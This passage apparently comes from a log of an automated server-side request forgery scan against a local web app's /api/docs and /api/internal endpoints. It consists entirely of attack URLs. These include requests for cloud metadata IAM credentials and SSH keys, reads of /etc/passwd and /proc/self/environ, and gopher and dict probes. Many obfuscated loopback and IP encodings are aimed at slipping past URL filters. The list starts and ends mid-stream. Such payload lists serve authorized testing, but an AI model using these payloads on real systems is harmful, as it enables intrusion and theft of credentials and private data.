`http://localhost:4200/api/docs?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/docs?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/docs?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/docs?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/docs?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/docs?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/docs?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/docs?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/docs?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/docs?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/docs?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/docs?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.0` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/docs?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/docs?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/docs?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/docs?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235521` +- Testing: `http://localhost:4200/api/docs?url=3232235777` +- Testing: `http://localhost:4200/api/docs?url=425.510.425.510` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/docs?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/docs?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/docs?url=instance-data` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A22` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A443` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A80` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/docs?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/docs?url=loopback` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A22` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A80` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A443` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/docs?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/docs?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/docs?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/docs?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/docs?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/docs?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/docs?url=127.1%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/docs?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/docs?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/docs?url=2130706433%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235521%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235777%2F` +- Testing: `http://localhost:4200/api/docs?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/docs?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/docs?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/docs?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/docs?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/docs?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/docs?url=0%2F` +- Testing: `http://localhost:4200/api/docs?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/internal +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/internal?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/internal?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/internal?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/internal?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/internal?url=127.1%3A80` +- Testing: `http://localhost:4200/api/internal?url=0` +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A80` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/internal?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/internal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/internal?url=127.127.127.127` +- Testing: `http://localhost:4200/api/internal?url=127.0.1.3` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.0` +- Testing: `http://localhost:4200/api/internal?url=2130706433` +- Testing: `http://localhost:4200/api/internal?url=017700000001` +- Testing: `http://localhost:4200/api/internal?url=0x7f000001` +- Testing: `http://localhost:4200/api/internal?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/internal?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=` +- Testing: `http://localhost:4200/api/internal?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/internal?url=` +- Testing: `http://localhost:4200/api/internal?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/internal?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/internal?url=google.com.localhost` +- Testing: `http://localhost:4200/api/internal?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/internal?url=` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/internal?url=localtest.me` +- Testing: `http://localhost:4200/api/internal?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/internal?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/internal?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/internal?url=2130706433%2F` +- Testing: `http://localhost:4200/api/internal?url=3232235521%2F` +- Testing: `http://localhost:4200/api/internal?url=3232235777%2F` +- Testing: `http://localhost:4200/api/internal?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/internal?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/internal?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/internal?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/internal?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/internal?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/internal?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/internal?url=0%2F` +- Testing: `http://localhost:4200/api/internal?url=127.1` +- Testing: `http://localhost:4200/api/internal?url=127.0.1` +- Testing: `http://localhost:4200/api/internal?url=localtest.me` +- Testing: `http://localhost:4200/api/internal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/internal?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/internal?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/internal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/internal?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/internal?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/internal?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/internal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/internal?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/internal?url=127.0.1.3` +- Testing: `http://localhost:4200/api/internal?url=0` +- Testing: `http://localhost:4200/api/internal?url=127.1` +- Testing: `http://localhost:4200/api/internal?url=127.0.1` +- Testing: `http://localhost:4200/api/internal?url=localhost` +- Testing: `http://localhost:4200/api/internal?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/internal?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/internal?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/internal?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/internal?url=7F000001` +- Testing: `http://localhost:4200/api/internal?url=2130706433` +- Testing: `http://localhost:4200/api/internal?url=6425673729` +- Testing: `http://localhost:4200/api/internal?url=127001` +- Testing: `http://localhost:4200/api/internal?url=127_0._0_1` +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/internal?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/internal?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/internal?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/internal?url=localtest.me` +- Testing: `http://localhost:4200/api/internal?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/internal?url=127.127.127.127` +- Testing: `http://localhost:4200/api/internal?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/internal?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/internal?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/internal?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=0x7f000001` +- Testing: `http://localhost:4200/api/internal?url=017700000001` +- Testing: `http://localhost:4200/api/internal?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/internal?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/internal?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/internal?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/internal?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/internal?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/internal?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/internal?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/internal?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254` +- Testing: `http://localhost:4200/api/internal?url=2852039166` +- Testing: `http://localhost:4200/api/internal?url=7147006462` +- Testing: `http://localhost:4200/api/internal?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/internal?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/internal?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/internal?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: 